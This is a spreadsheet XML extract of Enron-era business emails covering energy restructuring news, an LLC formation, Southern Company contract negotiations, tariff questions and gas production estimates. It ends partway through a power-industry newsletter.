    <t>Tue, 29 May 2001 08:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ljackson@caem.org'})</t>
  </si>
  <si>
    <t>Important Project Announcements from the Center for the Advancement_x000D_
 of Energy Markets</t>
  </si>
  <si>
    <t>[IMAGE]_x000D_
_x000D_
The California Electricity Crisis has resulted in an avalanche of=20_x000D_
opportunity  for the Center for the Advancement of Energy Markets (CAEM) to=_x000D_
=20_x000D_
provide its views  on energy restructuring. Below you will find links to so=_x000D_
me=20_x000D_
of our recent  documents._x000D_
_x000D_
In May, CAEM issued an update to the RED Index 2001 that?now includes the 1=_x000D_
3=20_x000D_
provinces and territories of  Canada. The RED Index is a scorecard on the=_x000D_
=20_x000D_
progress states are making in  electricity restructuring. RED  Index Update=_x000D_
=20_x000D_
for Canada.?USA Today did a full page spread using CAEM=01,s  RED Index to =_x000D_
give=20_x000D_
a summary of activity in the top 25 states. USA  Today Article. The Governo=_x000D_
r=20_x000D_
of Pennsylvania included the RED Index Rank of  Pennsylvania in his=20_x000D_
State-of-the-State Address. Pennsylvania  Governor The NY PSC issued a Pres=_x000D_
s=20_x000D_
Release on the RED Index. NY  Commission=20_x000D_
_x000D_
CAEM is pleased to announce the formation of a public-private sector projec=_x000D_
t =20_x000D_
called the Distributed Energy Task Force. At the request of important membe=_x000D_
rs=20_x000D_
of  Congress, CAEM will be assessing opportunities for promotion of=20_x000D_
distributed  energy technologies and matching those opportunities with poli=_x000D_
cy=20_x000D_
instruments,  i.e., tax incentives, funds for R&amp;D etc. For a copy of the=20_x000D_
project  description and participation information, email a request to=20_x000D_
jwimberly@caem.org._x000D_
_x000D_
In February, CAEM sponsored a meeting of the newly formed Leadership Counci=_x000D_
l =20_x000D_
on Energy Restructuring, an umbrella group of industry executives and publi=_x000D_
c =20_x000D_
sector officials who support the development of a coherent strategy on=20_x000D_
energy  restructuring. Leadership Council  Document_x000D_
_x000D_
In April, CAEM filed comments with the FTC on the proceeding that =20_x000D_
was?initiatedat the request of House  Energy and Commerce Committee Chairma=_x000D_
n=20_x000D_
Billy Tauzin on the impact of?States  restructuring. CAEM FTC  Comments_x000D_
=20_x000D_
_x000D_
In March, CAEM held its first meeting of the DISCO of the Future Forum. We =_x000D_
=20_x000D_
have posted several documents from that Forum. DISCO Forum Documents_x000D_
_x000D_
Last Sunday, the Philadelphia Inquirer published the views of CAEM on =20_x000D_
President Bush=01,s Energy Plan. Philadelphia  Inquirer Article=20_x000D_
_x000D_
In January, CAEM appeared on CNN to  discuss the California Crisis. CNN  Li=_x000D_
nk_x000D_
_x000D_
Feel free  to forward this email to colleagues who may be interested in the=_x000D_
=20_x000D_
Center's  activities.? For other information and  documents, please visit o=_x000D_
ur=20_x000D_
website at http://www.caem.org=20_x000D_
_x000D_
Please let us know if we can be of assistance to you in your efforts on =20_x000D_
energy restructuring._x000D_
_x000D_
If you do not wish to receive updates on CAEM=01,s Activity, please reply w=_x000D_
ith =20_x000D_
the word "remove" in the subject line. Thank you._x000D_
?_x000D_
_x000D_
Ken Malloy_x000D_
President_x000D_
Center for the Advancement of Energy  Markets_x000D_
5765-F Burke Center Parkway (PMB333)_x000D_
Burke, VA 22015-2233_x000D_
o  703-250-1580_x000D_
f? 248-928-5040_x000D_
e kmalloy@caem.org_x000D_
w http://www.caem.org_x000D_
_x000D_
_x000D_
?_x000D_
 - new logo16.bmp</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 02:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tori.hayden@enron.com', 'charon.little@enron.com', 'nicole.prince@enron.com', 'sarah.lewis@enron.com', 'natalie.nichols@enron.com', 'martha.reyna@enron.com', 'dana.davis@enron.com', 'dana.alexander@enron.com', 'jynell.holliday@enron.com', 'claudette.daniels@enron.com', 'christal.smith@enron.com'})</t>
  </si>
  <si>
    <t>SMILE FOR YOU</t>
  </si>
  <si>
    <t xml:space="preserve">Have a blessed weekend and keep on smiling!_x000D_
----- Forwarded by Charlotte Banks/Enron Communications on 11/03/00 10:24 AM _x000D_
-----_x000D_
_x000D_
	Delishea Dennis_x000D_
	11/03/00 09:52 AM_x000D_
		 _x000D_
		 To: Joel Valdez/Contractor/Enron Communications@Enron Communications, Helen _x000D_
Haynes/Enron Communications@Enron Communications, Paula Pierre/Enron _x000D_
Communications@Enron Communications, Inga Latson/Enron Communications@Enron _x000D_
Communications, Carmella Jones/NA/Enron@ENRON, Donna Henton/Contractor/Enron _x000D_
Communications@Enron Communications, Charlotte Banks/Enron _x000D_
Communications@Enron Communications, Pamela Chambers/Enron _x000D_
Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: SMILE FOR YOU_x000D_
_x000D_
Delishea Dennis_x000D_
Enron Broadband Services_x000D_
713-853-4586_x000D_
----- Forwarded by Delishea Dennis/Enron Communications on 11/03/00 09:44 AM _x000D_
-----_x000D_
_x000D_
	awoolco@enron.com_x000D_
	11/03/00 09:23 AM_x000D_
		 _x000D_
		 To: awoolco@enron.com_x000D_
		 cc: (bcc: Delishea Dennis/Enron Communications)_x000D_
		 Subject: SMILE FOR YOU_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: SMILEFORYOU__.doc)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Dec 2001 14:57:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'d..steffes@enron.com', 'jeff.dasovich@enron.com'})</t>
  </si>
  <si>
    <t>RE: NOTE ON Neg CTC</t>
  </si>
  <si>
    <t xml:space="preserve">Here's my cut:_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Friday, December 14, 2001 4:19 PM_x000D_
To:	Tribolet, Michael; Dasovich, Jeff_x000D_
Subject:	NOTE ON Neg CTC_x000D_
_x000D_
Please add so we can get to Fallon on Monday._x000D_
_x000D_
Jim_x000D_
_x000D_
 &lt;&lt; File: EES and EEMC Negative CTC.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 02:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'terry.kowalke@enron.com', 'lynn.blair@enron.com', 'john.buchanan@enron.com', 'raetta.zadow@enron.com', 'mike.bryant@enron.com', 'larry.berger@enron.com'})</t>
  </si>
  <si>
    <t>Brad Holmes Phone Number</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  so you have Brad's telephone number.  Thanks. Lynn_x000D_
---------------------- Forwarded by Lynn Blair/ET&amp;S/Enron on 05/30/2001 07:01 AM ---------------------------_x000D_
From:	Ricki Winters/ENRON@enronXgate on 05/29/2001 08:07 AM_x000D_
To:	Donna Scott/FGT/Enron@ENRON, Sheila Nacey/ET&amp;S/Enron@ENRON, Rick Dietz/ET&amp;S/Enron@ENRON, Steven January/ET&amp;S/Enron@ENRON, Mike Bryant/OTS/Enron@ENRON, Lynn Blair/ET&amp;S/Enron@ENRON, Brad Holmes/ENRON@enronXgate_x000D_
cc:	Alma Carrillo/ET&amp;S/Enron@ENRON, Ava Garcia/ET&amp;S/Enron@Enron, Sharon Brown/ET&amp;S/Enron@ENRON, Shelley Corman/ENRON@enronXgate, Pamela Daily/ENRON@enronXgate _x000D_
_x000D_
Subject:	Brad Holmes Phone Number_x000D_
_x000D_
Please, make note that the churn request below did not happen, therefore Brad will be unable to receive phonemail today.  Telecom was just here and informed me that it would take place tomorrow, May 30th.  However, they could not tell me if his phone mod would take place AM or PM._x000D_
_x000D_
His e-mail is working, so Alma could pass this information on to his group._x000D_
_x000D_
Thank you,_x000D_
Ricki_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Daily, Pamela  _x000D_
Sent:	Thursday, May 24, 2001 7:09 PM_x000D_
To:	Salinardo, John; Martin, Judy_x000D_
Cc:	Winters, Ricki_x000D_
Subject:	Churn request #4017_x000D_
Importance:	High_x000D_
_x000D_
John, I am submitting this online churn request #4017 as a modification to Bill Cordes' Houston information instead of a new request for Brad Holmes because Brad does not yet have a badge number. He will be assuming an existing office (EB4197) and phone number (x3-3432), previously assigned to Bill Cordes for his use when traveling to Houston. Please let me know if you need me to revise it later. Thanks!_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 10:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Due to a conflict with Dave and Mark's calendars I need move the East _x000D_
Midstream QBR to Monday August 14, 2000._x000D_
_x000D_
_x000D_
_x000D_
  Date:  August 14, 2000_x000D_
_x000D_
  Time:  1:00 pm - 4:00 pm_x000D_
_x000D_
  Location: 3321_x000D_
_x000D_
  Topic:  East Midstream QBR_x000D_
_x000D_
_x000D_
_x000D_
Please mark your calendar and plan to attend. I am extremely apologetic for _x000D_
any inconvenience this may have caused. _x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay 3-0643</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 07:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'mark.taylor@enron.com', 'nora.dobin@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">I think it would be helpful if we met sometime soon to "take inventory" as to _x000D_
our legal entity structures (thus far) for the Enron Net Works "family".  _x000D_
There has been a fair amount of entity formation (and, perhaps, commercial _x000D_
activity) and I want to make sure the all entities and assets are where they _x000D_
are suppose to be._x000D_
_x000D_
To that end, please contact my assistant, Darlene Forsyth (x3754) as to your _x000D_
availability over the next week so we may take an hour or so to compare notes._x000D_
Thanks._x000D_
_x000D_
Jordan_x000D_
---------------------- Forwarded by Jordan Mintz/HOU/ECT on 07/18/2000 03:04 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Nora Dobin@ENRON_x000D_
07/18/2000 10:56 AM_x000D_
To: Jordan Mintz/HOU/ECT@ECT, Michael K Patrick/NA/Enron@Enron_x000D_
cc: Harry Arora/HOU/ECT@ECT, Bill Brown/NA/Enron@ENRON, Brenda L _x000D_
Funk/HOU/ECT@ECT _x000D_
Subject: DealBench_x000D_
_x000D_
As most of us have discussed, Harry Arora's group has been developing an _x000D_
e-commerce site now known as DealBench.com (formerly EnronDirectFinance).  _x000D_
This site is being launched as an information dissemination/deal platform _x000D_
whose closest competitor is Intralinks.  DealBench's customers will be banks, _x000D_
law firms, and other businesses who desire a secure internet platform to _x000D_
conduct business transactions online.  Customers will license use of the site _x000D_
pursuant to written agreements.  Several trademark applications have been _x000D_
filed by Enron Corp. for the site.  Lawyers from Vinson &amp; Elkins in Austin _x000D_
(Bob Baird and Dean Harvey) and Houston (Steve Borgman) have been assisting _x000D_
us in various legal matters relating to the site._x000D_
_x000D_
At this point, the commercial team desires to move ahead with a limited _x000D_
liability entity to own and operate the DealBench business.  Based upon input _x000D_
from many of you, the proposal is to form a simple, single-member, _x000D_
owner-managed Delaware limited liability company named DealBench L.L.C.  The _x000D_
sole owner would be Enron Net Works LLC.  Upon formation, all assets and _x000D_
liabilities of the DealBench business will be assigned to, and assumed by the _x000D_
new LLC.  We understand that the private placement being contemplated by Net _x000D_
Works will be through a separate legal entity and currently does not _x000D_
contemplate the DealBench business.  We also understand that DealBench's _x000D_
ownership by Net Works will not preclude future flexibility in DealBench's _x000D_
ownership._x000D_
_x000D_
The commercial team desires to move forward with formation of DealBench _x000D_
L.L.C. this week.  Based upon your input, we will proceed as outlined above.  _x000D_
If you have any other thoughts or suggestions, please let me know.  Thanks _x000D_
for your help._x000D_
_x000D_
Regards, NJD_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 02:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: ENRON CONFIRMATION LETTER</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/09/2001 10:35 AM_x000D_
To: Les Webber/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Mark Breese/HOU/ECT@ECT _x000D_
Subject: FW: ENRON CONFIRMATION LETTER_x000D_
_x000D_
Les,_x000D_
_x000D_
Note redlined document (1st attachment) from Alan.  _x000D_
_x000D_
Alan received the GA and Alabama power RFP's.  I will get copies shortly.  _x000D_
Due date is July 2, 2001 which is 12 weeks away.  Alan wants our deal done 6 _x000D_
weeks prior to the due date so we have an extra 6 weeks to negotiate.  _x000D_
Southern Co has 1800 MW in the que and is 1st in line to win the bid provided _x000D_
economics are good._x000D_
_x000D_
I know you are in London but give me a call if you have the time so we can _x000D_
discuss._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Phil DeMoes/Corp/Enron on 04/09/2001 _x000D_
10:21 AM ---------------------------_x000D_
_x000D_
_x000D_
"Kilpatrick, Alan M." &lt;AMKilpat@southernco.com&gt; on 04/09/2001 10:01:53 AM_x000D_
To: "Phil DeMoes (E-mail)" &lt;phil.demoes@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: ENRON CONFIRMATION LETTER_x000D_
_x000D_
_x000D_
Please see the attached draft with our comments.  Please give me a call to_x000D_
discuss._x000D_
_x000D_
Alan Kilpatrick --- * - 205/257-6143 --- * - 250/257-7795 ---  * -_x000D_
amkilpat@southernco.com &lt;mailto:amkilpat@southernco.com&gt;_x000D_
_x000D_
-----Original Message-----_x000D_
From: Bailey, Donna [SMTP:dbailey@balch.com]_x000D_
&lt;mailto:[SMTP:dbailey@balch.com]&gt;_x000D_
Sent: Wednesday, April 04, 2001 11:28 AM_x000D_
To: Alan M. Kilpatrick; William Norrie McKenzie_x000D_
Subject: ENRON CONFIRMATION LETTER_x000D_
_x000D_
 &lt;&lt;XPPPRED.rtf&gt;&gt;  &lt;&lt;#485177.doc&gt;&gt;_x000D_
Attached are clean and redlined copies of the above agreement, reflecting_x000D_
our response to Enron's most recent markup of the document._x000D_
_x000D_
 - XPPPRED.rtf_x000D_
 - #485177.doc_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/09/2001 12:53 PM_x000D_
To: Les Webber/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Frank W Vickers/NA/Enron@Enron, Gil Muhl/Corp/Enron@ENRON, Mark _x000D_
Breese/HOU/ECT@ECT _x000D_
Subject: Southern Company's RFP_x000D_
_x000D_
Les,_x000D_
_x000D_
RFP's for power (Alabama Power/Georgia Power) that Southern Co. will respond _x000D_
to with Elba gas or long haul transport from the Gulf._x000D_
---------------------- Forwarded by Phil DeMoes/Corp/Enron on 04/09/2001 _x000D_
12:51 PM ---------------------------_x000D_
_x000D_
_x000D_
"Kilpatrick, Alan M." &lt;AMKilpat@southernco.com&gt; on 04/09/2001 12:41:58 PM_x000D_
To: "Kilpatrick, Alan M." &lt;AMKilpat@southernco.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Southern Company's RFP_x000D_
_x000D_
_x000D_
Please see attached the RFP's for Alabama Power and Georgia Power/ Savannah_x000D_
for your information.  Just thought you might like to see the actual RFP._x000D_
_x000D_
 &lt;&lt;APC2005RFP040201.doc&gt;&gt;  &lt;&lt;GPC2005RFP040201.doc&gt;&gt;_x000D_
_x000D_
Alan Kilpatrick --- * - 205/257-6143 --- * - 250/257-7795 ---  * -_x000D_
amkilpat@southernco.com &lt;mailto:amkilpat@southernco.com&gt;_x000D_
_x000D_
 - APC2005RFP040201.doc_x000D_
 - GPC2005RFP040201.doc_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/19/2001 05:41 PM_x000D_
To: Mark Breese/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/19/2001 06:30 PM_x000D_
To: Mark Breese/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Updated spreadsheet_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/20/2001 10:21 AM_x000D_
To: Les Webber/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark Breese/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Updated Pricing_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/22/2001 05:27 PM_x000D_
To: Dan J Hyvl/HOU/ECT@ECT, Les Webber/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Mark Breese/HOU/ECT@ECT _x000D_
Subject: Marked up Letter Agreement_x000D_
_x000D_
Dan,_x000D_
_x000D_
Attached is a redlined letter agreement with Southern Co. that I have made _x000D_
changes based on our discussion with them late Friday.  Les is going to help _x000D_
with some of the language.  Make sure to incorporate the new language on _x000D_
"Binding Commitment to Enter Into Confirmation Letter" I sent to you last _x000D_
Thursday or Friday.  I will send it again just to be sure.  As soon as he is _x000D_
ready, lets sitdown and discuss the agreement.  We have been able to raise _x000D_
Southern Co.'s price from Hub + $.15 to Hub + $.20 or $.21 with the _x000D_
possibility of up to Hub + $.25.  We will know more on price on Tuesday but _x000D_
lets keep blank for the time being.  I will be back in town on Tuesday.  Talk _x000D_
to you soon._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/22/2001 05:29 PM_x000D_
To: Les Webber/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Dan J Hyvl/HOU/ECT@ECT, _x000D_
Mark Breese/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: Revision to Paragraph 1 of Enron Letter Agreement_x000D_
_x000D_
Additional language per my email today._x000D_
---------------------- Forwarded by Phil DeMoes/Corp/Enron on 04/22/2001 _x000D_
05:28 PM ---------------------------_x000D_
_x000D_
_x000D_
"Kilpatrick, Alan M." &lt;AMKilpat@southernco.com&gt; on 04/20/2001 10:22:12 AM_x000D_
To: "Phil DeMoes (E-mail)" &lt;phil.demoes@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Revision to Paragraph 1 of Enron Letter Agreement_x000D_
_x000D_
_x000D_
Please see changes below that we discussed._x000D_
_x000D_
Alan Kilpatrick --- * - 205/257-6143 --- * - 250/257-7795 ---  * -_x000D_
amkilpat@southernco.com &lt;mailto:amkilpat@southernco.com&gt;_x000D_
_x000D_
-----Original Message-----_x000D_
From: Bailey, Donna [SMTP:dbailey@balch.com]_x000D_
&lt;mailto:[SMTP:dbailey@balch.com]&gt;_x000D_
Sent: Friday, April 20, 2001 9:31 AM_x000D_
To: Alan M. Kilpatrick_x000D_
Subject: Revision to Paragraph 1 of Enron Letter Agreement_x000D_
_x000D_
Alan, as we discussed. &lt;&lt;F89J01_.doc&gt;&gt;_x000D_
_x000D_
Donna J. Bailey_x000D_
Balch &amp; Bingham llp_x000D_
1710 Sixth Avenue North_x000D_
Birmingham, Alabama 35203-2015_x000D_
(205) 226-3451 -- direct dial_x000D_
(205) 226-8798 -- facsimile_x000D_
dbailey@balch.com &lt;mailto:dbailey@balch.com&gt;_x000D_
website address: www.balch.com &lt;http://www.balch.com&gt;_x000D_
This transmission is intended for the sole use of the addressee, and may_x000D_
contain information that by its privileged and confidential nature is exempt_x000D_
from disclosure under applicable law. You are hereby notified that any_x000D_
dissemination, distribution or duplication of this transmission by someone_x000D_
other than the intended recipient or its designated agent is strictly_x000D_
prohibited. If you have received this transmission in error, please notify_x000D_
the sender immediately by replying to this transmission, or by collect call_x000D_
to the above phone number._x000D_
_x000D_
_x000D_
_x000D_
 - F89J01_.doc_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/24/2001 04:46 PM_x000D_
To: Mark Breese/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark Breese/HOU/ECT on 04/25/2001 09:27 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Phil DeMoes@ENRON_x000D_
04/25/2001 08:54 AM_x000D_
To: Mark Breese/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Demand Charge Comparison_x000D_
_x000D_
Mark,_x000D_
_x000D_
I want to reschedule our meeting for Friday afternoon.  I would like to have _x000D_
the economics completed by complete your work on Les' and my spreadsheets _x000D_
along with Southern Company's method for calculating demand charges as _x000D_
attached below.  Lets discuss when you get a minute._x000D_
---------------------- Forwarded by Phil DeMoes/Corp/Enron on 04/25/2001 _x000D_
08:39 AM ---------------------------_x000D_
_x000D_
_x000D_
"Kilpatrick, Alan M." &lt;AMKilpat@southernco.com&gt; on 04/24/2001 05:13:58 PM_x000D_
To: "Phil DeMoes (E-mail)" &lt;phil.demoes@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Demand Charge Comparison_x000D_
_x000D_
_x000D_
Please see the spreadsheet below for your information.  As we discussed, you_x000D_
will need to make your own assumption of the cost for other plants bid into_x000D_
the RFP._x000D_
_x000D_
 &lt;&lt;McIntosh vs Plants.xls&gt;&gt;_x000D_
Alan Kilpatrick --- * - 205/257-6143 --- * - 250/257-7795 ---  * -_x000D_
amkilpat@southernco.com &lt;mailto:amkilpat@southernco.com&gt;_x000D_
_x000D_
 - McIntosh vs Plants.xls_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 03:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CES STUFF - GET READY!</t>
  </si>
  <si>
    <t>Are you ready for some FOOTBALL!!!  Sorry - that was just running thru my _x000D_
head.  I am about to start sending everything I have to all you fine people._x000D_
_x000D_
Transport_x000D_
I have the CES transport split between Wholesale and Retail.  For the 1st, _x000D_
all CES transport will be in a file all to itself.  The file is located _x000D_
at o:/logistics/capacity/east/ne/ces/2000ces01.xls.   We have most of the _x000D_
retail contacts in Sitara, there should be a deal number in column U._x000D_
_x000D_
Most of our transport problems for the 1st will come from the asset _x000D_
management deals. Ex.  Tennessee MUNi's.  How many of these are there??  Good _x000D_
question._x000D_
_x000D_
Good Luck_x000D_
_x000D_
Have fun ;)</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'lee.huber@enron.com', 'mary.miller@enron.com', 'kevin.hyatt@enron.com', 'maria.pavlou@enron.com', 'glen.hass@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>TW</t>
  </si>
  <si>
    <t>In the last several weeks several areas have come up where the TW commercial _x000D_
team could, in my opinion, use some clear written guidance on gray areas _x000D_
under the tariff ought to be interpreted.  Here is my list.  Please add items _x000D_
if I've missed any._x000D_
_x000D_
1.  When can TW "selectively market" available capacity?   I.e., if capacity _x000D_
is on the board as available, and no one has bought it, are there any limits _x000D_
on calling up a customer, or a group of customers, and pitching a deal?  I _x000D_
think we have a lot of discretion here--after all, using the telephone to _x000D_
talk to one customer is always "selective" since there's only one guy on the _x000D_
phone, not all our customers.  Also, can we deliberately leave a customer off _x000D_
the list of "the usual suspects" we call to pitch a special deal like an _x000D_
index to index deal or a discount?  I've asked Lee to pull together a quick _x000D_
analysis of this issue.  _x000D_
_x000D_
2.  If we get multiple bids for a chunk of capacity outside of the open _x000D_
season context, how do we allocate it?  This is the situation we got into a _x000D_
couple of weeks ago on the '02 and '03 space.  Are we always required to use _x000D_
a lottery?  Do we need to modify the tariff to use pro rata, or can we use _x000D_
pro rata simply by notifying the customers in advance?_x000D_
_x000D_
3.  What approval process applies to max rate contracts and negotiated rate _x000D_
contracts?  The ET&amp;S discount approval procedure still applies to TW _x000D_
discounted deals (even there is no ET&amp;S anymore).  I think all neg. rate _x000D_
deals should be approved by law and regulatory, but I don't need to see max _x000D_
rate strd language deals.    _x000D_
4.  ???  I think there was another issue, but I can't remember what it was.  _x000D_
_x000D_
Thanks for your input on this.  DF</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 04:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Revisions - March Wellhead Estimate</t>
  </si>
  <si>
    <t>Bob,_x000D_
_x000D_
Here are some revisions to the March wellhead production estimate resulting _x000D_
from the pre-nom meeting held this morning._x000D_
_x000D_
REVISIONS:_x000D_
_x000D_
Counterparty     Mtr no.  Prev Nom Curr Nom Sitara no._x000D_
Louis Dreyfus (frmly Costilla)   9724  29/d  4,000/d  125895_x000D_
North Central Corp    9767  560/d  0  139363_x000D_
North Central Corp    6296  1,637/d  1,800/d  136222_x000D_
Prize Energy Resources   4965  78/d  2,000/d  131720_x000D_
Bass Enterprises(frmly Richardson)  9807  7,025/d  9,000/d  141691_x000D_
Swift Energy     9636  34/d  0  135664_x000D_
Crosstex Energy    9858  8,637/d  8,500/d  500668_x000D_
_x000D_
NEW PRODUCTION:_x000D_
_x000D_
Wagner &amp; Brown, Ltd.    6589  0  8,000/d  n/a_x000D_
The Houston Exploration Co.   9696  0  6,000/d  n/a_x000D_
Stone Energy Corp    9696  0  4,000/d  n/a_x000D_
HESCO Gathering Oil Co.   9876  0  1,000/d  n/a_x000D_
Wheeler Operating Co.    9879  0  1,000/d  n/a _x000D_
Safari Production Co.    4594  0  400/d  n/a_x000D_
Helmerich &amp; Payne    9841  0  1,500/d  n/a_x000D_
_x000D_
_x000D_
_x000D_
I'll continue to advise you when necessary.  By the way what's your cut-off; _x000D_
I'd like for your sitara position to be consistent with the final number I'll _x000D_
provide to Darren._x000D_
_x000D_
Thanks,_x000D_
_x000D_
vlt_x000D_
x-6353</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 07:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'schuler@rice.edu'})</t>
  </si>
  <si>
    <t>frozenset({'rshapiro@enron.com', 'steffes@enron.com', 'skean@enron.com'})</t>
  </si>
  <si>
    <t>quick thanks!</t>
  </si>
  <si>
    <t>Dear Steve, Rick, and Jim,_x000D_
_x000D_
Thanks for meeting with me last Friday. I appreciate your time and candor._x000D_
_x000D_
I'm looking forward to working with you next spring and anytime in the _x000D_
interim._x000D_
_x000D_
Take care,_x000D_
_x000D_
Doug_x000D_
_x000D_
_x000D_
_x000D_
Doug Schuler_x000D_
Associate Professor of Management_x000D_
Jesse H. Jones Graduate School of Management_x000D_
Rice University_x000D_
6100 Main Street, MS-533_x000D_
Houston, TX 77005-1892 USA_x000D_
office: 353 Baker Hall_x000D_
tel. 713-348-5472_x000D_
fax. 713-348-6296_x000D_
schuler@rice.edu</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 06:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Lucy,_x000D_
_x000D_
 Now that #44 is rented and you have settled in for a couple of months, we _x000D_
need to focus on expenses and recordkeeping._x000D_
_x000D_
 First, I want to implement the following changes:_x000D_
_x000D_
  1.  No Overtime without my written (or email) instructions._x000D_
  2.  Daily timesheets for you and Wade faxed to me daily_x000D_
  3.  Paychecks will be issued each Friday by me at the State Bank_x000D_
  4.  No more expenditures on office or landscape than is necessary for basic _x000D_
operations._x000D_
_x000D_
_x000D_
 Moving on to the checkbook, I have attached a spreadsheet that organizes all _x000D_
the checks since Jan. 1._x000D_
 When you open the file, go to the "Checkbook" tab and look at the yellow _x000D_
highlighted items.  I have questions about these items._x000D_
 Please gather receipts so we can discuss._x000D_
_x000D_
Phillip_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 02:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PowerMarketers.com Daily Power Report for 19 January 2001</t>
  </si>
  <si>
    <t>Attention POWER REPORT Readers: Go to _x000D_
http://www.powermarketers.com/prdaily.htm to view today's edition with direct _x000D_
headline links to each story.]_x000D_
_x000D_
======================================================================_x000D_
The Industry's Preferred Source For Breaking Energy News And Information_x000D_
http://www.powermarketers.com_x000D_
----------------------------------------------------------------------_x000D_
T H E P O W E R M A R K E T E R S .C O M P O W E R R E P O R T_x000D_
_x000D_
Today's Headlines From POWERMARKETERS.COM_x000D_
_x000D_
Subscriptions to The PowerMarketers.com Power Report are free - you will _x000D_
never be charged._x000D_
_x000D_
You may redistribute this e-mail without change. You may not redistribute _x000D_
stories._x000D_
_x000D_
To register for a free subscription, point your browser to: _x000D_
http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
************************************************************************_x000D_
_x000D_
------Advertisement------_x000D_
_x000D_
POWER CRUNCH IN THE WEST_x000D_
February 12-14, 2001  SAN DIEGO, CA_x000D_
_x000D_
http://www.pmaconference.com/crunch.pdf_x000D_
_x000D_
